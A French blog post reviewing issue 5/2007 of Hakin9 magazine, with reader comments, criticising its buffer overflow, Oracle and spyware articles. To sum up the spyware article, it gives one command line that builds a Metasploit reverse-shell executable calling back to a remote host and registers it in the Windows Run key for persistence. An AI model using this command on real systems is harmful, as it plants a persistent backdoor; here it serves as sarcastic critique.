samedi 16 juin 2007

Je suis désolé d'insister, mais ...

... je viens de me forcer à lire Hakin9 5/2007, et ça n'est vraiment pas bon.

Article de couverture : "buffer overflow sous Windows XP SP2". Alléchant n'est-ce pas ?

En pratique, il s'agit d'un tutoriel "de base" sur le buffer overflow. L'auteur compile tous ses programmes de test sans "/GS". Les shellcodes exécutés ne sont pas compatibles avec DEP. Du coup on a quand même du mal à voir le lien avec Windows XP SP2 ...

Je passe sur la pleine page consacrée au résultat de la commande "print Pex::Text::PatternCreate(5000)". Plutôt que de copier/coller ce résultat dans un programme en Python pour ouvrir une socket, il aurait peut-être été plus astucieux d'ouvrir la socket directement en PERL dans la suite du programme initial ?

Intersticiel : publicité pour Ashampoo AntiSpyware. Je cite : "[...] protects you against the entire spectrum of new malware threats [...] including hijackers, dialers, spyware, worms, adware, trojans, key loggers and even the treacherous new rootkits". Pour $30 !

Troisième article : "Introduction à la sécurité sous Oracle". Traduit du tchèque. Tout est dit.

Mais quand même, j'ai du mal à voir ce que vient faire la restriction des baux DHCP à une liste d'adresses MAC connues. Vos serveurs Oracle sont en DHCP, vous ?

Quatrième article : "Développement d'un espiogiciel d'évaluation". Pour résumer :

./msfpayload win32_reverse EXITFUNC=process LHOST=1.2.3.4 LPORT=12345 X > malware.exe && REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v MonMien /t REG_SZ /d malware.exe

Sauf que l'auteur a tenu à tout réimplémenter, en enrobant d'une étude sociologique sur la communication moderne.


Bref, j'arrête là, mais du coup on se demande pourquoi les articles mettent plusieurs mois à être publiés. Ca n'est certainement pas le fait du processus de relecture, ou alors il est sérieusement à revoir lui-même !

5 commentaires:

pello a dit…

Ashampoo n'est à priori pas recensé dans les listes rogue de spywarewarrior.com c'est déjà pas mal :)

Pour le windows XP SP2, l'article est-il vraiment réel ? peut-être est-ce un fake tel qu'on peut trouver dans le livre puzzle for hackers.

Le module socket de PERL n'était sûrement pas assez hype, ça le fait plus de passer en PYTHON, les lunettes 3D sont-elles fournies avec le magazine ?

Pour Oracle, peut-être parlait t'il un serveur DHCP développé en SQL pour se protéger lui-même contre les requêtes rogue DHCP ? (non ? bon OK)

La communication moderne ? du SE ?

C'est très étonnant de pouvoir lire ça. Pourtant vu les logos partenaires, j'imagine qu'il y a pleins de relecteurs censés être "assidus".
Pour balancer et la délation c'est la mode parce que sinon c'est pas marrant. Un collègue est béta-testeur et quand il voit un message de hakin9, deux secondes après, le mail est dans la trash.

!Youpi!

MeiK a dit…

"Bref, j'arrête là, mais du coup on se demande pourquoi les articles mettent plusieurs mois à être publiés. Ca n'est certainement pas le fait du processus de relecture, ou alors il est sérieusement à revoir lui-même !"

Ah ah ah, et pour 25 euros la page au passage (non, je n'ai jamais ecrit pour eux, je connais juste leurs tarifs)

PS: j'ai bien aime le "Traduit du tcheque, tout est dit". J'ai feuillete une fois un exemplaire de ce magazine, c'etait tres mal traduit. 3 ans plus tard ca n'a visiblement pas change :)

Anonyme a dit…

un RSSI, qui fait un cour de SSI dans une école d'ingé, vient de nous recommander la lecture de ce mag...
je me doutais bien qu'il n'était pas aussi calé que ca.
+++

newsoft a dit…

Attention, je n'ai pas dit que tout était à jeter ! L'article sur les BHO tenait la route par exemple.

Le problème c'est que les mauvais articles ne donnent pas envie de lire les bons ...

Bruno Kerouanton a dit…

@Anonyme

"un RSSI, qui fait un cour de SSI dans une école d'ingé, vient de nous recommander la lecture de ce mag... je me doutais bien qu'il n'était pas aussi calé que ca."

Ben heu... j'espère que ce n'est pas moi qui suis visé !

J'avais récupéré l'année dernière une 20aine de numéros de Hakin9 et du coup je les ai distribués lors de mon cours. Il se trouve que ce numéro n'était pas trop mal, et comme mon cours n'a pas vocation à former des experts sécurité je choisis toujours la revue avant distribution. Cette année comme à chaque fois j'avais hésité entre Misc de mars 2007, Hakin9 de la même période et mes anciens numéros. Verdict : MISC toujours aussi bien mais largement trop ardu pour mes élèves (à 1 ou 2 exceptions près). Hakin9 actuel : vraiment trop mauvais. Je me suis donc résolu à distribuer mes anciens numéros.

@Anonyme... Tu parles de quelle école d'ingé et de quel cours ?